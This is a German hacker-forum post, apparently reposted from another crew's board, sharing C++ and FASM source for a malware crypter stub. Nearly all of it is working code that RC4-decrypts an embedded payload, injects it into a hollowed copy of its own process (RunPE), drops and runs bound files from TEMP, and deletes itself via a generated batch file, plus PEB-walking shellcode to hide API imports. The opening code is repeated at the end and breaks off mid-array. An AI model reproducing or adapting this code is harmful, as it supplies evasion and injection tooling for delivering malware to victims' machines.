Cyber Tjak
05.10.2010, 14:16
Hab keine Verwendung mehr.
Werde langsam mal Source schnipsel posten, ist noch viel unnützer code drin der zu fixen ist (ist alles Debug Style hrhr)
Alles zu lernzwecken.
Hier beginnt die Stub, Cpp:
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
UCHAR NTDLLDLL_STR[] = "NTDLL.DLL";
UCHAR SHELL32_STR[] = "SHELL32.DLL";
UCHAR KERNEL32DLL_STR[] = "KERNEL32.DLL";
UCHAR LSTRCATA_STR[] = "lstrcatA";
UCHAR HEAPALLOC_STR[] = "HeapAlloc";
UCHAR WRITEFILE_STR[] = "WriteFile";
UCHAR EXITPROCESS_STR[] = "ExitProcess";
UCHAR CLOSEHANDLE_STR[] = "CloseHandle";
UCHAR CREATEFILE_STR[] = "CreateFileA";
UCHAR RESUMETHREAD_STR[] = "ResumeThread";
UCHAR SHELLEXECUTE_STR[] = "ShellExecuteA";
UCHAR LOCKRESOURCE_STR[] = "LockResource";
UCHAR LOADRESOURCE_STR[] = "LoadResource";
UCHAR LOADLIBRARYA_STR[] = "LoadLibraryA";
UCHAR RTLMOVEMEMORY_STR[] = "RtlMoveMemory";
UCHAR FINDRESOURCEA_STR[] = "FindResourceA";
UCHAR SIZEOFRESOURCE_STR[] = "SizeofResource";
UCHAR GETPROCESSHEAP_STR[] = "GetProcessHeap";
UCHAR VIRTUALALLOCEX_STR[] = "VirtualAllocEx";
UCHAR CREATEPROCESSA_STR[] = "CreateProcessA";
UCHAR GETTHREADCONTEXT_STR[] = "GetThreadContext";
UCHAR SETTHREADCONTEXT_STR[] = "SetThreadContext";
UCHAR GETMODULEFILENAMEA_STR[] = "GetModuleFileNameA";
UCHAR NTWRITEVIRTUALMEMORY_STR[] = "NtWriteVirtualMemory";
UCHAR NTUNMAPVIEWOFSECTION_STR[] = "NtUnmapViewOfSection";
UCHAR GETENVIROMENTVARIABLE_STR[] = "GetEnvironmentVariableA";
UCHAR ALL_ENCRYPTION_KEY_STR[] = "PECrypt_Encryption_Password_Place_Holder||||||";
UCHAR TEMP_VAR[] = "TEMP";
UCHAR SHELL_CMD[] = "OPEN";
UCHAR BACKSPACE_STR[] = "\\";
UCHAR RESOURCE_NAME[] = "RTDATA";
UCHAR BATCH[] = ".BAT";
UCHAR MELT_BATCH1[] = "@ECHO OFF\r\n:L\r\nDEL \"";
UCHAR MELT_BATCH2[] = "\"\r\nIF EXIST \"";
UCHAR MELT_BATCH3[] = "\" GOTO L\r\nM:\r\nDEL \"";
UCHAR MELT_BATCH4[] = "\"\r\n:M\r\nIF EXIST \"";
UCHAR MELT_BATCH5[] = "\" GOTO M\r\n";
UCHAR API_SHELL[] =
"\xE8\x01\x00\x00\x00\xC3\x55\x89\xE5\x83\xEC\x24\x 89\x45\xDC\x89"
"\x5D\xE0\x89\x4D\xE4\x31\xC0\x31\xDB\x31\xC9\x64\x 8B\x71\x30\x8B"
"\x76\x0C\x8B\x76\x1C\x8B\x46\x08\x8B\x7E\x20\x8B\x 36\x38\x4F\x18"
"\x75\xF3\x89\x45\xEC\x89\xC6\x03\x70\x3C\x89\x75\x F0\x83\xC6\x78"
"\x03\x06\x89\x45\xF8\x8B\x5D\xEC\x03\x58\x20\x89\x 5D\xF4\x8B\x7D"
"\xF4\x31\xC9\x8B\x5D\xEC\x03\x1F\x81\x3B\x47\x65\x 74\x50\x74\x06"
"\x83\xC7\x04\x41\xEB\xED\x81\x7B\x04\x72\x6F\x63\x 41\x74\x06\x83"
"\xC7\x04\x41\xEB\xDE\x89\xCF\x8B\x45\xF8\x8B\x5D\x EC\x83\xC0\x24"
"\x03\x18\xD1\xC1\x01\xCB\x31\xC9\x0F\xB7\x0B\xC1\x C1\x02\x8B\x45"
"\xF8\x8B\x5D\xEC\x83\xC0\x1C\x03\x18\x01\xCB\x8B\x 03\x03\x45\xEC"
"\x89\x45\xE8\xFF\x75\xE4\xFF\x75\xEC\xFF\x55\xE8\x FF\x75\xDC\xFF"
"\xD0\xFF\x75\xE0\x50\xFF\x55\xE8\xC9\xC3";
typedef struct _RESSOURCE_STRCT
{
CHAR* ReadByte;
DWORD ReadByteSize;
} RESSOURCE_STRCT, *PRESSOURCE_STRCT;
typedef LPVOID (__stdcall* HeapAllocF)(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
typedef DWORD (__stdcall* ResumeThreadF)(HANDLE hThread);
typedef LPVOID (__stdcall* LockResourceF)(HGLOBAL hResData);
typedef HANDLE (__stdcall* GetProcessHeapF)(VOID);
typedef VOID* (__stdcall* VirtualAllocExF)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef BOOL (__stdcall* CreateProcessAF)(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);;
typedef VOID (__stdcall* RtlMoveMemoryF)(VOID UNALIGNED *Destination, CONST VOID UNALIGNED *Source, SIZE_T Length);
typedef HRSRC (__stdcall* FindResourceAF)(HMODULE hModule, LPCSTR lpName, LPCSTR lpType);
typedef HGLOBAL (__stdcall* LoadResourceF)(HMODULE hModule,HRSRC hResInfo);
typedef DWORD (__stdcall* SizeOfResourceF)(HMODULE hModule, HRSRC hResInfo);
typedef BOOL (__stdcall* GetThreadContextF)(HANDLE hThread, LPCONTEXT lpContext);
typedef BOOL (__stdcall* SetThreadContextF)(HANDLE hThread, CONST CONTEXT *lpContext);
typedef DWORD (__stdcall* GetModuleFileNameF)(HMODULE hModule, LPCH lpFilename, DWORD nSize);
typedef BOOL (__stdcall* NtWriteVirtualMemoryF)(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten);
typedef LONG (__stdcall* NtUnmapViewOfSectionF)(HANDLE ProcessHandle, PVOID BaseAddress);
typedef DWORD (__stdcall* GetEnvironmentVariableAF)(LPCSTR lpName, LPSTR lpBuffer, DWORD nSize);
typedef HINSTANCE (__stdcall* ShellExecuteF)(HWND hwnd, LPCTSTR lpOperation, LPCTSTR lpFile, LPCTSTR lpParameters, LPCTSTR lpDirectory, INT nShowCmd);
typedef HANDLE (__stdcall* CreateFileF)(LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
typedef BOOL (__stdcall* WriteFileF)(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
typedef BOOL (__stdcall* CloseHandleF)(HANDLE hObject);
typedef LPSTR (__stdcall* lstrcatAF)(LPSTR lpString1, LPCSTR lpString2);
typedef VOID (__stdcall* ExitProcessF)(UINT uExitCode);
lstrcatAF lstrcatA_;
HeapAllocF HeapAlloc_;
WriteFileF WriteFile_;
CreateFileF CreateFile_;
CloseHandleF CloseHandle_;
ExitProcessF ExitProcess_;
ResumeThreadF ResumeThread_;
LockResourceF LockResource_;
LoadResourceF LoadResource_;
ShellExecuteF ShellExecute_;
RtlMoveMemoryF RtlMoveMemory_;
FindResourceAF FindResource_;
SizeOfResourceF SizeOfResource_;
GetProcessHeapF GetProcessHeap_;
VirtualAllocExF VirtualAllocEx_;
CreateProcessAF CreateProcessA_;
GetThreadContextF GetThreadContext_;
SetThreadContextF SetThreadContext_;
GetModuleFileNameF GetModuleFileName_;
NtWriteVirtualMemoryF NtWriteVirtualMemory_;
NtUnmapViewOfSectionF NtUnmapViewOfSection_;
GetEnvironmentVariableAF GetEnvironmentVariableA_;
VOID SetupAPI(CONST CHAR* DLLName, CONST CHAR* FunctionName, LPVOID WriteVar);
LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen);
PRESSOURCE_STRCT LoadResourceData(INT INT_RES, CONST CHAR* RS_NAME);
VOID BinderExecute(PRESSOURCE_STRCT ResStruct);
DWORD RunPE(LPBYTE InjectByte);
LPVOID GetAddr(LPVOID String);
VOID MeltFile(VOID);
VOID GetAPIAddr();
INT WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nShowCmd)
{
PRESSOURCE_STRCT OptionsResStrc = 0;
PRESSOURCE_STRCT InjectResStrc = 0;
PRESSOURCE_STRCT BindResStrc = 0;
GetAPIAddr();
OptionsResStrc = LoadResourceData(101, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
//OptionsResStrc->ReadByte = (CHAR*)RC4((LPBYTE)OptionsResStrc->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), OptionsResStrc->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);
InjectResStrc = LoadResourceData(102, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
BindResStrc = LoadResourceData(103, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
if(BindResStrc->ReadByteSize != 0)
{
BinderExecute(BindResStrc);
};
//InjectResStrc->ReadByte = (CHAR*)RC4((LPBYTE)InjectResStrc->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), InjectResStrc->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);
RunPE((LPBYTE)InjectResStrc->ReadByte);
if(OptionsResStrc->ReadByte[0] == '1')
{
MeltFile();
};
return 0;
};
VOID MeltFile(VOID)
{
CHAR* MyPath = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
GetModuleFileName_(NULL, MyPath, MAX_PATH);
CHAR* NewPath = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
GetEnvironmentVariableA_((LPCSTR)GetAddr(&TEMP_VAR), NewPath, MAX_PATH);
lstrcatA_(NewPath, (CHAR*)GetAddr(&BACKSPACE_STR));
CHAR* BATCH_DATA = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, 1024);
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH1));
lstrcatA_(BATCH_DATA, MyPath);
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH2));
lstrcatA_(BATCH_DATA, MyPath);
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH3));
lstrcatA_(BATCH_DATA, NewPath);
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&RESOURCE_NAME));
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&BATCH));
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH4));
lstrcatA_(BATCH_DATA, NewPath);
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&RESOURCE_NAME));
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&BATCH));
lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH5));
lstrcatA_(NewPath, (CHAR*)GetAddr(&RESOURCE_NAME));
lstrcatA_(NewPath, (CHAR*)GetAddr(&BATCH));
HANDLE hFile = CreateFile_((LPCSTR)NewPath, GENERIC_WRITE, 0, 0, CREATE_NEW, NULL, NULL);
DWORD dwWritten = 0;
DWORD nSize = 0;
do
{
nSize++;
}
while(BATCH_DATA[nSize] != '\0');
WriteFile_(hFile, BATCH_DATA, nSize, &dwWritten, NULL);
CloseHandle_(hFile);
ShellLoop:
if((INT)ShellExecute_(NULL, (LPCSTR)GetAddr(&SHELL_CMD), NewPath, NULL, NULL, 0) < 32)
{
goto ShellLoop;
};
ExitProcess_(ERROR_SUCCESS);
return;
};
VOID BinderExecute(PRESSOURCE_STRCT ResStruct)
{
DWORD I = 0;
for(I = 1; I < ResStruct->ReadByteSize * 2; I++)
{
CHAR* TempPath = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
GetEnvironmentVariableA_((LPCSTR)GetAddr(&TEMP_VAR), TempPath, MAX_PATH);
PRESSOURCE_STRCT BinderStruct = 0;
BinderStruct = LoadResourceData(103 + I, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
BinderStruct->ReadByte = (CHAR*)RC4((LPBYTE)BinderStruct->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), BinderStruct->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);
PRESSOURCE_STRCT BindStruct2 = 0;
BindStruct2 = LoadResourceData(103 + I + 1, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
BindStruct2->ReadByte = (CHAR*)RC4((LPBYTE)BindStruct2->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), BindStruct2->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);
lstrcatA_(TempPath, (CHAR*)GetAddr(BACKSPACE_STR));
lstrcatA_(TempPath, BindStruct2->ReadByte);
HANDLE hFile = CreateFile_((LPCSTR)TempPath, GENERIC_WRITE, 0, 0, CREATE_NEW, NULL, NULL);
DWORD dwWritten = 0;
WriteFile_(hFile, BinderStruct->ReadByte, BinderStruct->ReadByteSize, &dwWritten, NULL);
CloseHandle_(hFile);
ShellExecute_(NULL, (LPCSTR)GetAddr(&SHELL_CMD), TempPath, NULL, NULL, 5);
I++;
};
return;
};
LPVOID GetAddr(LPVOID String)
{
LPVOID RTChar = 0;
_asm CALL DELTA
DELTA:
_asm POP EBX
_asm SUB EBX, OFFSET DELTA
_asm MOV ESI, String
_asm LEA EAX, [EBX + ESI]
_asm MOV RTChar, EAX
return RTChar;
};
PRESSOURCE_STRCT LoadResourceData(INT INT_RES, CONST CHAR* RS_NAME)
{
HRSRC hRsrc = 0;
CHAR* lpFile = 0;
HGLOBAL hGlob = 0;
DWORD dwFileSize = 0;
PRESSOURCE_STRCT uResStrt;
uResStrt = (PRESSOURCE_STRCT)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(RESSOURCE_STRCT));
hRsrc = FindResource_(NULL, MAKEINTRESOURCE(INT_RES), RS_NAME);
dwFileSize = SizeOfResource_(NULL, hRsrc);
hGlob = LoadResource_(NULL, hRsrc);
lpFile = (CHAR*)LockResource_(hGlob);
uResStrt->ReadByte = (CHAR*)HeapAlloc_(GetProcessHeap_(), NULL, dwFileSize);
RtlMoveMemory_(uResStrt->ReadByte, lpFile, dwFileSize);
uResStrt->ReadByte[dwFileSize] = '\0';
uResStrt->ReadByteSize = dwFileSize;
return uResStrt;
};
LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen)
{
INT A = 0, B = 0, S[256];
BYTE Swap;
DWORD dwCount;
for(A = 0; A < 256; A++)
{
S[A] = A;
};
for(A = 0; A < 256; A++)
{
B = (B + S[A] + lpKey[A % dwKeyLen]) % 256;
Swap = S[A];
S[A] = S[B];
S[B] = Swap;
};
A = 0;
B = 0;
for(dwCount = 0; dwCount < dwBufLen; dwCount++)
{
A = (A + 1) % 256;
B = (B + S[A]) % 256;
Swap = S[A];
S[A] = S[B];
S[B] = Swap;
lpBuf[dwCount] ^= S[(S[A] + S[B]) % 256];
};
return lpBuf;
};
VOID SetupAPI(CONST CHAR* DLLName, CONST CHAR* FunctionName, LPVOID WriteVar)
{
DWORD AddressOfAPI_Shell = (DWORD)GetAddr(API_SHELL);
CHAR* LoadLibStr = (CHAR*)GetAddr(LOADLIBRARYA_STR);
LPVOID vVAR = GetAddr(WriteVar);
_asm PUSHAD
_asm MOV EAX, DLLName
_asm MOV EBX, FunctionName
_asm MOV ECX, LoadLibStr
_asm CALL AddressOfAPI_Shell
_asm MOV EDI, vVAR
_asm MOV [EDI], EAX
return;
};
DWORD RunPE(LPBYTE InjectByte)
{
LONG I = 0;
CHAR* HostFile = 0;
CONTEXT* tCONTEXT = 0;
STARTUPINFO* tSTARTUPINFO = 0;
IMAGE_DOS_HEADER* tIMAGE_DOS_HEADER = 0;
IMAGE_NT_HEADERS* tIMAGE_NT_HEADERS = 0;
PROCESS_INFORMATION* tPROCESS_INFORMATION = 0;
IMAGE_SECTION_HEADER* tIMAGE_SECTION_HEADER = 0;
HostFile = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
tCONTEXT = (CONTEXT*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(CONTEXT));
tSTARTUPINFO = (STARTUPINFO*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(STARTUPINFO));
tIMAGE_DOS_HEADER = (IMAGE_DOS_HEADER*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(IMAGE_DOS_HEADER));
tIMAGE_NT_HEADERS = (IMAGE_NT_HEADERS*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(IMAGE_NT_HEADERS));
tPROCESS_INFORMATION = (PROCESS_INFORMATION*)HeapAlloc_(GetProcessHeap_() , HEAP_ZERO_MEMORY, sizeof(PROCESS_INFORMATION));
tIMAGE_SECTION_HEADER = (IMAGE_SECTION_HEADER*)HeapAlloc_(GetProcessHeap_( ), HEAP_ZERO_MEMORY, sizeof(IMAGE_SECTION_HEADER));
tCONTEXT->ContextFlags = CONTEXT_FULL;
tSTARTUPINFO->cb = sizeof(STARTUPINFO);
GetModuleFileName_(NULL, HostFile, MAX_PATH);
tIMAGE_DOS_HEADER = (IMAGE_DOS_HEADER*)&InjectByte[0];
tIMAGE_NT_HEADERS = (IMAGE_NT_HEADERS*)&InjectByte[tIMAGE_DOS_HEADER->e_lfanew];
if(CreateProcessA_(HostFile, NULL, NULL, NULL, NULL, CREATE_SUSPENDED, NULL, NULL, tSTARTUPINFO, tPROCESS_INFORMATION))
{
NtUnmapViewOfSection_(tPROCESS_INFORMATION->hProcess, (LPVOID)tIMAGE_NT_HEADERS->OptionalHeader.ImageBase);
VirtualAllocEx_(tPROCESS_INFORMATION->hProcess, (LPVOID)tIMAGE_NT_HEADERS->OptionalHeader.ImageBase, tIMAGE_NT_HEADERS->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
NtWriteVirtualMemory_(tPROCESS_INFORMATION->hProcess, (LPVOID)tIMAGE_NT_HEADERS->OptionalHeader.ImageBase, &InjectByte[0], tIMAGE_NT_HEADERS->OptionalHeader.SizeOfHeaders, NULL);
for(I = 0; I < tIMAGE_NT_HEADERS->FileHeader.NumberOfSections; I++)
{
tIMAGE_SECTION_HEADER = (IMAGE_SECTION_HEADER*)HeapAlloc_(GetProcessHeap_( ), HEAP_ZERO_MEMORY, sizeof(IMAGE_SECTION_HEADER));
tIMAGE_SECTION_HEADER = (IMAGE_SECTION_HEADER*)&InjectByte[tIMAGE_DOS_HEADER->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * I];
NtWriteVirtualMemory_(tPROCESS_INFORMATION->hProcess, (LPVOID)(tIMAGE_NT_HEADERS->OptionalHeader.ImageBase + tIMAGE_SECTION_HEADER->VirtualAddress), &InjectByte[tIMAGE_SECTION_HEADER->PointerToRawData], tIMAGE_SECTION_HEADER->SizeOfRawData, NULL);
};
GetThreadContext_(tPROCESS_INFORMATION->hThread, tCONTEXT);
DWORD eImage = tIMAGE_NT_HEADERS->OptionalHeader.ImageBase;
DWORD eEntry = tIMAGE_NT_HEADERS->OptionalHeader.AddressOfEntryPoint;
NtWriteVirtualMemory_(tPROCESS_INFORMATION->hProcess, &eEntry, HeapAlloc_(GetProcessHeap_(), NULL, sizeof(DWORD)), sizeof(DWORD), NULL);
_asm MOV EAX, eImage
_asm ADD EAX, eEntry
DWORD eEAX = 0;
_asm MOV eEAX, EAX
tCONTEXT->Eax = eEAX;
SetThreadContext_(tPROCESS_INFORMATION->hThread, tCONTEXT);
ResumeThread_(tPROCESS_INFORMATION->hThread);
return tPROCESS_INFORMATION->dwProcessId;
};
return 0;
};
VOID GetAPIAddr()
{
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&LSTRCATA_STR), &lstrcatA_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&HEAPALLOC_STR), &HeapAlloc_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&WRITEFILE_STR), &WriteFile_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&CREATEFILE_STR), &CreateFile_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&CLOSEHANDLE_STR), &CloseHandle_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&EXITPROCESS_STR), &ExitProcess_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&LOADRESOURCE_STR), &LoadResource_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&RESUMETHREAD_STR), &ResumeThread_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&LOCKRESOURCE_STR), &LockResource_);
SetupAPI((CONST CHAR*)GetAddr(&SHELL32_STR ), (CONST CHAR*)GetAddr(&SHELLEXECUTE_STR), &ShellExecute_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&RTLMOVEMEMORY_STR), &RtlMoveMemory_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&FINDRESOURCEA_STR), &FindResource_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&SIZEOFRESOURCE_STR), &SizeOfResource_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETPROCESSHEAP_STR), &GetProcessHeap_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&VIRTUALALLOCEX_STR), &VirtualAllocEx_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&CREATEPROCESSA_STR), &CreateProcessA_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETTHREADCONTEXT_STR), &GetThreadContext_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&SETTHREADCONTEXT_STR), &SetThreadContext_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETMODULEFILENAMEA_STR), &GetModuleFileName_);
SetupAPI((CONST CHAR*)GetAddr(&NTDLLDLL_STR ), (CONST CHAR*)GetAddr(&NTWRITEVIRTUALMEMORY_STR), &NtWriteVirtualMemory_);
SetupAPI((CONST CHAR*)GetAddr(&NTDLLDLL_STR ), (CONST CHAR*)GetAddr(&NTUNMAPVIEWOFSECTION_STR), &NtUnmapViewOfSection_);
SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETENVIROMENTVARIABLE_STR), &GetEnvironmentVariableA_);
return;
};
Hier das Api Shell (Asm), vermutlich die Ursache für die x64 Bugs:
;SetupAPI Shell
;GetProcAddress & LoadLibraryA-Replacement
;
;Usage:
;EAX = Pointer to DLL-Name
;EBX = Pointer to Function-Name
;ECX = Pointer to "LoadLibraryA" (String)
;
include "H:\FASM\INCLUDE\WIN32AX.INC"
USE32
CALL ShellCode
RET
proc ShellCode
locals
DLLName DD ?
FunctionName DD ?
LoadLibraryA DD ?
ListGPA DD ?
mzKernel DD ?
peKernel DD ?
anKernel DD ?
etKernel DD ?
ProcAddr DD ?
endl
ShellBegin:
MOV [DLLName], EAX
MOV [FunctionName], EBX
MOV [LoadLibraryA], ECX
XOR EAX, EAX
XOR EBX, EBX
XOR ECX, ECX
MOV ESI, DWORD[FS:ECX+30h]
MOV ESI, DWORD[ESI+0Ch]
MOV ESI, DWORD[ESI+1Ch]
KernelMark:
MOV EAX, DWORD[ESI+8]
MOV EDI, DWORD[ESI+20h]
MOV ESI, DWORD[ESI]
CMP BYTE[EDI+18h], CL
JNE KernelMark
MOV [mzKernel], EAX
MOV ESI, EAX
ADD ESI, DWORD[EAX+0x3C]
MOV [peKernel], ESI
ADD ESI, 0x78
ADD EAX, DWORD[ESI]
MOV [etKernel], EAX
MOV EBX, [mzKernel]
ADD EBX, DWORD[EAX+0x20]
MOV [anKernel], EBX
MOV EDI, [anKernel]
XOR ECX, ECX
LIST_GPA:
MOV EBX, [mzKernel]
ADD EBX, DWORD[EDI]
CMP DWORD[EBX], 'GetP'
JE GOT_PROC1
ADD EDI, 4
INC ECX
JMP LIST_GPA
GOT_PROC1:
CMP DWORD[EBX+4], 'rocA'
JE GOT_PROC2
ADD EDI, 4
INC ECX
JMP LIST_GPA
GOT_PROC2:
MOV EDI, ECX
MOV EAX, DWORD[etKernel]
MOV EBX, DWORD[mzKernel]
ADD EAX, 0x24
ADD EBX, DWORD[EAX]
ROL ECX, 1
ADD EBX, ECX
XOR ECX, ECX
MOVZX ECX, WORD[EBX]
ROL ECX, 2
MOV EAX, DWORD[etKernel]
MOV EBX, DWORD[mzKernel]
ADD EAX, 0x1C
ADD EBX, DWORD[EAX]
ADD EBX, ECX
MOV EAX, DWORD[EBX]
ADD EAX, DWORD[mzKernel]
MOV[ListGPA], EAX
PUSH [LoadLibraryA]
PUSH DWORD[mzKernel]
CALL DWORD[ListGPA]
PUSH [DLLName]
CALL EAX
PUSH [FunctionName]
PUSH EAX
CALL DWORD[ListGPA]
LEAVE
RET
endp
Und hier das in MASM kompilierbare Dump woraus ich den Shellcode erstellt habe (von mir, Tjak, gekürzt, weil der Text zu lang wäre):
http://nopaste.free-hack.com/index.php?id=b4504e9c86
Viel Spaß hrhr
Credits gehen noch an e0n (hackhound) hatte mal ne vorlage für das Api Shell genutzt.
Rest ist 100% selfcoded.
Hoffe ihr schätzt meine Arbeit hrhr^^
http://hba-crew.to/images/smilies/thx.png
Quelle: M4x Maximus aka Cyberterrorist M4x (Coder) von HBA-Crew - Thread-Link (http://hba-crew.to/showthread.php?p=101917#post101917)
Werde langsam mal Source schnipsel posten, ist noch viel unnützer code drin der zu fixen ist (ist alles Debug Style hrhr)
Alles zu lernzwecken.
Hier beginnt die Stub, Cpp:
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
UCHAR NTDLLDLL_STR[] = "NTDLL.DLL";
UCHAR SHELL32_STR[] = "SHELL32.DLL";
UCHAR KERNEL32DLL_STR[] = "KERNEL32.DLL";
UCHAR LSTRCATA_STR[] = "lstrcatA";
UCHAR HEAPALLOC_STR[] = "HeapAlloc";
UCHAR WRITEFILE_STR[] = "WriteFile";
UCHAR EXITPROCESS_STR[] = "ExitProcess";
UCHAR CLOSEHANDLE_STR[] = "CloseHandle";
UCHAR CREATEFILE_STR[] = "CreateFileA";
UCHAR RESUMETHREAD_STR[] = "ResumeThread";
UCHAR SHELLEXECUTE_STR[] = "ShellExecuteA";
UCHAR LOCKRESOURCE_STR[] = "LockResource";
UCHAR LOADRESOURCE_STR[] = "LoadResource";
UCHAR LOADLIBRARYA_STR[] = "LoadLibraryA";
UCHAR RTLMOVEMEMORY_STR[] = "RtlMoveMemory";
UCHAR FINDRESOURCEA_STR[] = "FindResourceA";
UCHAR SIZEOFRESOURCE_STR[] = "SizeofResource";
UCHAR GETPROCESSHEAP_STR[] = "GetProcessHeap";
UCHAR VIRTUALALLOCEX_STR[] = "VirtualAllocEx";
UCHAR CREATEPROCESSA_STR[] = "CreateProcessA";
UCHAR GETTHREADCONTEXT_STR[] = "GetThreadContext";
UCHAR SETTHREADCONTEXT_STR[] = "SetThreadContext";
UCHAR GETMODULEFILENAMEA_STR[] = "GetModuleFileNameA";
UCHAR NTWRITEVIRTUALMEMORY_STR[] = "NtWriteVirtualMemory";
UCHAR NTUNMAPVIEWOFSECTION_STR[] = "NtUnmapViewOfSection";
UCHAR GETENVIROMENTVARIABLE_STR[] = "GetEnvironmentVariableA";
UCHAR ALL_ENCRYPTION_KEY_STR[] = "PECrypt_Encryption_Password_Place_Holder||||||";
UCHAR TEMP_VAR[] = "TEMP";
UCHAR SHELL_CMD[] = "OPEN";
UCHAR BACKSPACE_STR[] = "\\";
UCHAR RESOURCE_NAME[] = "RTDATA";
UCHAR BATCH[] = ".BAT";
UCHAR MELT_BATCH1[] = "@ECHO OFF\r\n:L\r\nDEL \"";
UCHAR MELT_BATCH2[] = "\"\r\nIF EXIST \"";
UCHAR MELT_BATCH3[] = "\" GOTO L\r\nM:\r\nDEL \"";
UCHAR MELT_BATCH4[] = "\"\r\n:M\r\nIF EXIST \"";
UCHAR MELT_BATCH5[] = "\" GOTO M\r\n";
UCHAR API_SHELL[] =
"\xE8\x01\x00\x00\x00\xC3\x55\x89\xE5\x83\xEC\x24\x 89\x45\xDC\x89"
